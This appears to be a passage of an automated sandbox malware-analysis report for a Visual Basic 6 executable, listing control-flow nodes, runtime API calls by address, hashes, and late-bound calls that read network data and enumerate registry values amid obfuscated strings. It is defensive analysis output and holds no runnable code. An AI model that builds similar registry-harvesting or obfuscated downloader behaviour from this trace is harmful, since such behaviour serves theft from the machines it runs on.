19168->19181 19182 42ecb0 124 API calls 19171->19182 19188 411f0f __vbaStrMove __vbaFreeStrList __vbaFreeVarList __vbaVarForNext 19180->19188 19189 41c460 1131 API calls 19181->19189 19190 4121b3 __vbaStrMove __vbaStrCopy __vbaStrMove 19182->19190 19188->19164 19198 411b3e __vbaStrMove __vbaFreeStrList __vbaFreeVarList __vbaVarForNext 19189->19198 19199 412219 __vbaGenerateBoundsError 19190->19199 19200 41220d 19190->19200 19198->19041 19199->19200 19213 42ddc0 20 API calls 19200->19213

                                                          Control-flow Graph

                                                          APIs
                                                          • __vbaFixstrConstruct.MSVBVM60(00000100,?,6D41A323,6D42D8B1,00402BF8), ref: 00432DAC
                                                          • __vbaNew2.MSVBVM60(0040B3CC,0043D7AC), ref: 00432DC4
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,021D004C,0040B3BC,00000014), ref: 00432DE9
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B924,00000060), ref: 00432E0D
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,00000001,00000000,00000000,00000000), ref: 00432E20
                                                          • __vbaSetSystemError.MSVBVM60(00000000), ref: 00432E34
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00432E46
                                                          • __vbaFreeObj.MSVBVM60 ref: 00432E4E
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,04000000,00000000), ref: 00432E6D
                                                          • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000,00000000,04000000,00000000), ref: 00432E7C
                                                          • __vbaStrToUnicode.MSVBVM60(+@,?,?,00000000,00000000,04000000,00000000), ref: 00432E86
                                                          • __vbaFreeStr.MSVBVM60(?,00000000,00000000,04000000,00000000), ref: 00432E92
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 00432EB4
                                                          • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00432EC1
                                                          • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00432ECB
                                                          • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 00432EDE
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00432EEA
                                                          • __vbaStrCopy.MSVBVM60(?,04000000,00000000), ref: 00432EF5
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 00432F17
                                                          • InternetReadFile.WININET(?,00000000), ref: 00432F27
                                                          • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00432F31
                                                          • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 00432F3E
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00432F4A
                                                          • __vbaStrCopy.MSVBVM60(00000001,?), ref: 00432F68
                                                          • #631.MSVBVM60(00000000), ref: 00432F6F
                                                          • __vbaStrMove.MSVBVM60 ref: 00432F7A
                                                          • __vbaLsetFixstr.MSVBVM60(00000000,?,?), ref: 00432F8A
                                                          • __vbaStrCat.MSVBVM60(?,?), ref: 00432F94
                                                          • __vbaStrMove.MSVBVM60 ref: 00432F9F
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00432FAF
                                                          • __vbaSetSystemError.MSVBVM60 ref: 00432FBC
                                                          • #598.MSVBVM60 ref: 00432FC9
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 00432FDD
                                                          • __vbaStrCopy.MSVBVM60 ref: 00432FE5
                                                          • __vbaFreeStr.MSVBVM60(0043302F), ref: 00433027
                                                          • __vbaFreeStr.MSVBVM60 ref: 0043302C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$ErrorSystem$AnsiFixstrList$CopyLsetUnicode$CheckHresultMove$#598#631ConstructFileInternetNew2Read
                                                          • String ID: +@
                                                          • API String ID: 2099816023-3835504741
                                                          • Opcode ID: ff79127468d54d56c65a2b4fb234e00d9a04df02ea88e933ff6b37a7ff715c2b
                                                          • Instruction ID: edbb0f66bed64e040fb60fe4c65a7fb52963413ea26ab3d363ace2bf05d0307f
                                                          • Opcode Fuzzy Hash: ff79127468d54d56c65a2b4fb234e00d9a04df02ea88e933ff6b37a7ff715c2b
                                                          • Instruction Fuzzy Hash: 4E81DD75D00209AFDB04EBE5DD85EEEBB7DEF88700F10851AF601B72A0DA745945CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d787e95ab2364f8c5944c0cb77657234ffda1dd00567e8ec13494130a83e1fd
                                                          • Instruction ID: 43803f6cc10c83bb38a9917bfb5aaa7b0d14b68f36a172b12e4e776ba28fef18
                                                          • Opcode Fuzzy Hash: 2d787e95ab2364f8c5944c0cb77657234ffda1dd00567e8ec13494130a83e1fd
                                                          • Instruction Fuzzy Hash: DAB01275B8C041EED70076B86D014251180D2C83433209C33F501F61C0CA38DF00C33D
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6), ref: 004154CE
                                                          • __vbaAryConstruct2.MSVBVM60(?,00407468,00000008,?,?,?,?,004030D6), ref: 00415500
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0041550F
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,004030D6), ref: 00415527
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,004030D6), ref: 00415541
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,004030D6), ref: 00415552
                                                          • __vbaStrMove.MSVBVM60 ref: 0041557A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041559F
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004155C6
                                                          • __vbaStrCopy.MSVBVM60 ref: 004155DA
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415605
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 00415620
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004030D6), ref: 0041563A
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0041564B
                                                          • __vbaStrMove.MSVBVM60 ref: 00415673
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415698
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004156BF
                                                          • __vbaStrCopy.MSVBVM60 ref: 004156D3
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004156FE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 00415719
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 00415733
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 00415744
                                                          • __vbaStrMove.MSVBVM60 ref: 0041576C
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004157B8
                                                          • __vbaStrCopy.MSVBVM60 ref: 004157CC
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004157F7
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415812
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041582C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041583D
                                                          • __vbaStrMove.MSVBVM60 ref: 00415865
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041588A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004158B1
                                                          • __vbaStrCopy.MSVBVM60 ref: 004158C5
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004158F0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041590B
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415925
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415936
                                                          • __vbaStrMove.MSVBVM60 ref: 0041595E
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415983
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004159AA
                                                          • __vbaStrCopy.MSVBVM60 ref: 004159BE
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004159E9
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415A04
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415A1E
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415A2F
                                                          • __vbaStrMove.MSVBVM60 ref: 00415A57
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415AA3
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415AB7
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415AE2
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415AFD
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415B17
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415B28
                                                          • __vbaStrMove.MSVBVM60 ref: 00415B50
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415B75
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415B9C
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415BB0
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415BDB
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415BF6
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415C10
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415C21
                                                          • __vbaStrMove.MSVBVM60 ref: 00415C49
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415C6E
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415C95
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415CA9
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415CD4
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415CEF
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415D09
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415D1A
                                                          • __vbaStrMove.MSVBVM60 ref: 00415D42
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415D8E
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415DA2
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415DCD
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415DE8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415E02
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415E13
                                                          • __vbaStrMove.MSVBVM60 ref: 00415E3B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415E60
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415E87
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415E9B
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415EC6
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415EE1
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415EFB
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415F0C
                                                          • __vbaStrMove.MSVBVM60 ref: 00415F34
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00415F59
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00415F80
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415F94
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00415FBF
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415FDA
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415FF4
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416005
                                                          • __vbaStrMove.MSVBVM60 ref: 0041602D
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00416079
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041608D
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004160B8
                                                          • __vbaStrCopy.MSVBVM60 ref: 004160D3
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004160ED
                                                          • __vbaStrCopy.MSVBVM60 ref: 004160FE
                                                          • __vbaStrMove.MSVBVM60 ref: 00416126
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041614B
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00416172
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416186
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004161B1
                                                          • __vbaStrCopy.MSVBVM60 ref: 004161CC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004161E6
                                                          • __vbaStrCopy.MSVBVM60 ref: 004161F7
                                                          • __vbaStrMove.MSVBVM60 ref: 0041621F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00416244
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041626B
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041627F
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004162AA
                                                          • __vbaStrCopy.MSVBVM60 ref: 004162C5
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004162DF
                                                          • __vbaStrCopy.MSVBVM60 ref: 004162F0
                                                          • __vbaStrMove.MSVBVM60 ref: 00416318
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00416364
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416378
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 004163A3
                                                          • __vbaStrCopy.MSVBVM60 ref: 004163BE
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004163D8
                                                          • __vbaStrCopy.MSVBVM60 ref: 004163E9
                                                          • __vbaStrMove.MSVBVM60 ref: 00416411
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00416436
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041645D
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416471
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041649C
                                                          • __vbaStrCopy.MSVBVM60 ref: 004164B7
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004164D1
                                                          • __vbaStrCopy.MSVBVM60 ref: 004164E2
                                                          • __vbaStrMove.MSVBVM60 ref: 0041650A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041652F
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00416556
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041656A
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00416595
                                                          • __vbaStrCopy.MSVBVM60 ref: 004165B0
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004165CA
                                                          • __vbaStrCopy.MSVBVM60 ref: 004165DB
                                                          • __vbaStrMove.MSVBVM60 ref: 00416603
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041664F
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416663
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041668E
                                                          • __vbaStrCopy.MSVBVM60 ref: 004166A9
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004166C3
                                                          • __vbaStrCopy.MSVBVM60 ref: 004166D4
                                                          • __vbaStrMove.MSVBVM60 ref: 004166FC
                                                          • __vbaVarMove.MSVBVM60(?,?), ref: 0041672E
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 00416752
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041676D
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00416787
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416798
                                                          • __vbaStrMove.MSVBVM60 ref: 004167C0
                                                          • __vbaVarMove.MSVBVM60(?,?), ref: 004167F5
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 00416819
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416834
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041684E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041685F
                                                          • __vbaStrMove.MSVBVM60 ref: 00416887
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004168A8
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 004168D2
                                                          • #716.MSVBVM60(00000008,00000000), ref: 004168E0
                                                          • __vbaObjVar.MSVBVM60(00000008), ref: 004168ED
                                                          • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 004168FB
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,00000000,00000000,00000000), ref: 0041692D
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041693C
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416954
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041696E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041697F
                                                          • __vbaStrMove.MSVBVM60 ref: 004169A7
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004169C8
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 004169F2
                                                          • #716.MSVBVM60(00000008,00000000), ref: 00416A00
                                                          • __vbaObjVar.MSVBVM60(00000008), ref: 00416A0D
                                                          • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00416A1B
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,00000000,00000000,00000000), ref: 00416A4D
                                                          • __vbaFreeVar.MSVBVM60 ref: 00416A5C
                                                          • __vbaChkstk.MSVBVM60 ref: 00416A82
                                                          • __vbaLateMemSt.MSVBVM60(?,Global), ref: 00416AB8
                                                          • __vbaChkstk.MSVBVM60 ref: 00416ADE
                                                          • __vbaLateMemSt.MSVBVM60(?,IgnoreCase), ref: 00416B14
                                                          • __vbaChkstk.MSVBVM60 ref: 00416B26
                                                          • __vbaLateMemSt.MSVBVM60(?,Pattern), ref: 00416B50
                                                          • __vbaChkstk.MSVBVM60 ref: 00416B62
                                                          • __vbaLateMemSt.MSVBVM60(?,Pattern), ref: 00416B98
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,00000000,00000000), ref: 00416BC2
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416BDD
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416C03
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00416C1D
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416C2E
                                                          • __vbaStrMove.MSVBVM60 ref: 00416C56
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00416C77
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416C88
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00416CA2
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416CB3
                                                          • __vbaStrMove.MSVBVM60 ref: 00416CDB
                                                          • __vbaStrMove.MSVBVM60(00000000,?), ref: 00416CFC
                                                          • __vbaStrMove.MSVBVM60 ref: 00416D4E
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00416D5C
                                                          • __vbaStrMove.MSVBVM60 ref: 00416D6A
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00416D7D
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00416D84
                                                          • #626.MSVBVM60(?,00000008,0000000A), ref: 00416DAF
                                                          • __vbaObjVar.MSVBVM60(?), ref: 00416DBC
                                                          • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00416DC7
                                                          • __vbaFreeStrList.MSVBVM60(0000000D,?,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00416E2A
                                                          • __vbaFreeVarList.MSVBVM60(00000003,00000008,0000000A,?), ref: 00416E4A
                                                          • #598.MSVBVM60 ref: 00416E5A
                                                          • __vbaStrCopy.MSVBVM60 ref: 00416E6F
                                                          • __vbaLenBstr.MSVBVM60(00000000), ref: 00416E96
                                                          • __vbaVarVargNofree.MSVBVM60 ref: 00416EC0
                                                          • __vbaLenVar.MSVBVM60(00000008,00000000), ref: 00416ECE
                                                          • __vbaVarCmpEq.MSVBVM60(0000000A,00008002,00000000), ref: 00416EE3
                                                          • __vbaVarNot.MSVBVM60(?,00000000), ref: 00416EF1
                                                          • __vbaVarAnd.MSVBVM60(?,0000000B,00000000), ref: 00416F06
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 00416F0D
                                                          • __vbaFreeVar.MSVBVM60 ref: 00416F20
                                                          • __vbaStrCat.MSVBVM60(004055A8,00000000), ref: 00416F43
                                                          • __vbaStrMove.MSVBVM60 ref: 00416F4E
                                                          • __vbaVarVargNofree.MSVBVM60(00000008), ref: 00416F7E
                                                          • __vbaVarCat.MSVBVM60(00000008,00000000), ref: 00416F8C
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00416F93
                                                          • __vbaStrMove.MSVBVM60 ref: 00416F9E
                                                          • __vbaFreeVar.MSVBVM60 ref: 00416FAA
                                                          • __vbaChkstk.MSVBVM60 ref: 0041700E
                                                          • __vbaChkstk.MSVBVM60 ref: 0041703D
                                                          • __vbaChkstk.MSVBVM60 ref: 0041706C
                                                          • __vbaChkstk.MSVBVM60 ref: 0041709B
                                                          • __vbaLateMemCall.MSVBVM60(?,enumvalues,00000004), ref: 004170D0
                                                          • #560.MSVBVM60(?), ref: 004170E7
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 0041710A
                                                          • __vbaRefVarAry.MSVBVM60(?), ref: 00417119
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 00417124
                                                          • __vbaRedimPreserve.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000002), ref: 0041714E
                                                          • __vbaRefVarAry.MSVBVM60(?), ref: 00417165
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 00417170
                                                          • __vbaI2I4.MSVBVM60 ref: 00417178
                                                          • __vbaVarCopy.MSVBVM60 ref: 004171E3
                                                          • __vbaChkstk.MSVBVM60 ref: 00417208
                                                          • __vbaVarIndexLoad.MSVBVM60(00000008,?,00000001), ref: 00417242
                                                          • __vbaVarMove.MSVBVM60 ref: 00417253
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00417282
                                                          • __vbaStrCat.MSVBVM60(004055A8,?), ref: 004172B6
                                                          • __vbaChkstk.MSVBVM60 ref: 004172E4
                                                          • __vbaVarIndexLoadRef.MSVBVM60(?,?,00000001), ref: 0041731E
                                                          • __vbaChkstk.MSVBVM60 ref: 00417352
                                                          • __vbaVarCat.MSVBVM60(0000000A,?,00000008), ref: 00417391
                                                          • __vbaChkstk.MSVBVM60 ref: 0041739E
                                                          • __vbaChkstk.MSVBVM60 ref: 004173C0
                                                          • __vbaChkstk.MSVBVM60 ref: 004173EF
                                                          • __vbaLateMemCall.MSVBVM60(?,getstringvalue,00000004), ref: 00417424
                                                          • __vbaFreeVarList.MSVBVM60(00000003,00000008,0000000A,?), ref: 00417444
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 0041747B
                                                          • __vbaStrCat.MSVBVM60(004055A8,?), ref: 004174AF
                                                          • __vbaChkstk.MSVBVM60 ref: 004174DD
                                                          • __vbaVarIndexLoadRef.MSVBVM60(?,?,00000001), ref: 00417517
                                                          • __vbaChkstk.MSVBVM60 ref: 0041754B
                                                          • __vbaVarCat.MSVBVM60(0000000A,?,00000008), ref: 0041758A
                                                          • __vbaChkstk.MSVBVM60 ref: 00417597
                                                          • __vbaChkstk.MSVBVM60 ref: 004175B9
                                                          • __vbaChkstk.MSVBVM60 ref: 004175E8
                                                          • __vbaStrCat.MSVBVM60(004055A8,?), ref: 00418945
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041899F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004189BC
                                                          • __vbaVarCat.MSVBVM60(0000000A,?,00000008), ref: 004189DD
                                                          • __vbaChkstk.MSVBVM60 ref: 004189EA
                                                          • __vbaVarLateMemSt.MSVBVM60(?,firebirdsncgfOSuUoKhMPcZZKaHeweYGxAwtGYYSacRrcPIcUQEflashers), ref: 00418A1C
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A), ref: 00418A32
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00418A99
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00418AB6
                                                          • __vbaChkstk.MSVBVM60 ref: 00418AC7
                                                          • __vbaVarIndexLoad.MSVBVM60(00000008,?,00000001), ref: 00418B01
                                                          • __vbaChkstk.MSVBVM60 ref: 00418B11
                                                          • __vbaVarLateMemSt.MSVBVM60(?,palmitoleicLIAHVjNxTeizPuQabacli), ref: 00418B43
                                                          • __vbaFreeVar.MSVBVM60 ref: 00418B4F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00418BB4
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00418BD1
                                                          • __vbaVarCat.MSVBVM60(00000008,00000008,?), ref: 00418BF2
                                                          • __vbaChkstk.MSVBVM60 ref: 00418BFF
                                                          • __vbaVarLateMemSt.MSVBVM60(?,foambNcAqYCUqVnIeMZJldXgNbootjack), ref: 00418C31
